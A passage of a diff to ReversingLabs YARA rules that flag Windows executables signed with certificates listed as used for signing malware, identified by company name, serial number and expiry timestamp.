-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trap Capital ApS" and pe.signatures [ i ] . serial == "71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kometa" and pe.signatures [ i ] . serial == "4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "173f89ca-e7b3-507b-96c1-325dd06210f8"
+		id = "a75cc09f-de73-5db4-9ace-189e8da99053"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9630-L9646"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3616-L3634"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73"
+		logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20093,21 +42487,21 @@ rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures [ i ] . serial == "4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures [ i ] . serial == "c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" ) and 1583824676 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b7731056-1674-5375-a3cb-69632670d6d9"
+		id = "d2d71058-f7b9-594f-b099-75aa4774306f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9648-L9666"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3636-L3654"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1"
+		logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20117,21 +42511,21 @@ rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Contact Merger Holding ApS" and ( pe.signatures [ i ] . serial == "00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures [ i ] . serial == "8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" ) and 1636039748 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures [ i ] . serial == "cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" ) and 1578786662 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2578655e-6420-5a67-9116-cab5cf5bc195"
+		id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9668-L9686"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3656-L3674"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c"
+		logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20141,21 +42535,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAIN BUILDING TEAM s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures [ i ] . serial == "ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" ) and 1635854205 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures [ i ] . serial == "ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" ) and 1582675200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77319b9c-6075-5ac7-958c-d76916873e85"
+		id = "0cf7573f-290d-58ac-989f-f82e9313d54e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9688-L9706"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3676-L3694"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355"
+		logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20165,21 +42559,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rakurs LLC" and ( pe.signatures [ i ] . serial == "00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures [ i ] . serial == "fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" ) and 1636046757 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures [ i ] . serial == "98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" ) and 1575849600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28"
+		id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9708-L9726"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3696-L3714"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17"
+		logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20189,21 +42583,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRUST DANMARK ApS" and ( pe.signatures [ i ] . serial == "00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures [ i ] . serial == "cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" ) and 1632884040 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and ( pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures [ i ] . serial == "86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" ) and 1574791194 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152"
+		id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9728-L9746"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3716-L3732"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571"
+		logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20213,21 +42607,21 @@ rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAQA EVENTS LTD" and ( pe.signatures [ i ] . serial == "00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures [ i ] . serial == "e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" ) and 1634720407 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UAB GT-servis" and pe.signatures [ i ] . serial == "07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb"
+		id = "9de11ec8-f408-593c-895f-08dff703ff10"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9748-L9764"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3734-L3750"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7"
+		logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20237,21 +42631,21 @@ rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rose Holm International ApS" and pe.signatures [ i ] . serial == "75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7f98e550-fca6-564f-bbad-40e153f17adc"
+		id = "eb42b516-aac6-5bee-af1d-70e0e66700f5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9766-L9782"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3752-L3770"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479"
+		logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20261,21 +42655,21 @@ rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"CENTR MBP\"" and ( pe.signatures [ i ] . serial == "00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures [ i ] . serial == "9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" ) and 1581618180 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684"
+		id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9784-L9802"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3772-L3788"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40"
+		logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20285,21 +42679,21 @@ rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sopiteks LLC" and ( pe.signatures [ i ] . serial == "00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures [ i ] . serial == "a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" ) and 1631908320 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CENTR MBP LLC" and pe.signatures [ i ] . serial == "54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb"
+		id = "10134543-04fa-5a2f-8f77-98444ad1d7f0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9804-L9820"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3790-L3806"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153"
+		logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20309,21 +42703,21 @@ rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures [ i ] . serial == "33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Teleneras MB" and pe.signatures [ i ] . serial == "03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ff8149b-4a90-5593-b12a-d815b04fce7e"
+		id = "593c1799-a5df-5b3e-8a8b-826d808a14f0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9822-L9840"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3808-L3826"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9"
+		logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20333,21 +42727,21 @@ rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Argus Security Maintenance Systems Inc." and ( pe.signatures [ i ] . serial == "00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures [ i ] . serial == "be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" ) and 1634235015 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH" and ( pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . serial == "b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" ) and 1581936420 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2"
+		id = "9ac976c0-260f-5207-ae39-bbb722c38a92"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9842-L9858"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3828-L3844"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0"
+		logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20357,21 +42751,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CB CAM SP Z O O" and pe.signatures [ i ] . serial == "0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8e059a2a-c436-5247-b395-a2f594c1c9a9"
+		id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9860-L9878"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3846-L3864"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533"
+		logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20381,21 +42775,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) and 1635153791 <= pe.signatures [ i ] . not_after )
